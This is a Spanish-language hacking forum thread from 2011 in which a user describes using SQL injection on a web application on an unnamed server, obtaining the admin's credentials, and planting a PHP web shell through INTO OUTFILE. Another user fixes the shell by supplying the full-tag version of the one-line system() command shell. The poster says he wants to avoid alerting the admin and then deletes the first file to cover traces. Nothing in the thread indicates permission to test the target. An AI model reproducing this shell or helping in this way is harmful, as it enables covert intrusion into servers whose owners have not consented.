elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Shell php a medias
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Shell php a medias  (Leído 3,942 veces)
4rkn63l

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Shell php a medias
« en: 5 Marzo 2011, 18:35 pm »

Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell
Código:
<? system($_REQUEST['cmd']); ?>
, pero al intentar ejecutarlo no pasa absolutamente nada, y es obvio q no pase nada por que si veo el codigo fuente de archivo se muestra el codigo php, como si php no lo estuviese parseando.¿A que se debe esto?¿Es que acaso no es suficiente con que el archivo este en algun subdirectorio del arbol web?
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Shell php a medias
« Respuesta #1 en: 5 Marzo 2011, 20:49 pm »

Explicación de INTO OUTFILE en una Inyección SQL
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
4rkn63l

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Re: Shell php a medias
« Respuesta #2 en: 5 Marzo 2011, 21:55 pm »

Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.

Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente.
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Shell php a medias
« Respuesta #3 en: 5 Marzo 2011, 22:32 pm »

Eso se debe a la directiva short_open_tag, trata de subir el archivo de nuevo pero asi:

Código
  1. <?php system($_REQUEST['cmd']); ?>
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
4rkn63l

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Re: Shell php a medias
« Respuesta #4 en: 5 Marzo 2011, 22:55 pm »

si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.

Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no??  :xD
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Shell php a medias
« Respuesta #5 en: 5 Marzo 2011, 22:57 pm »

si claro xD
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
4rkn63l

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Re: Shell php a medias
« Respuesta #6 en: 6 Marzo 2011, 00:09 am »

Bingo!!  ::)

Muchas gracias ~ Yoya ~ por tu ayuda,la verdad no pensé que el modo de las etiquetas pudiera afectar, leí una info donde efectivamente dice que en php5 no vienen habilitadas las etiquetas cortas que es lo que me hacias mencion anteriormente...pero bueno de los errores se aprende.

Ademas pude borrar el primer archivo sin problemas jejeje.
En línea

not-all0w3d

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Shell php a medias
« Respuesta #7 en: 21 Marzo 2011, 22:18 pm »

¿Por qué no sólo usaste una backdoor sencilla?..
En fin el problema está solucionado, sólo era una sugerencia.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
problema para quitar contraseña a xp (solucionado a medias) « 1 2 »
Windows
sanson 15 14,497 Último mensaje 20 Noviembre 2010, 13:22 pm
por Randomize
Matriz , bucle a medias (buscaminas)
Programación C/C++
Neibar 1 2,404 Último mensaje 12 Junio 2012, 11:19 am
por Neibar
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines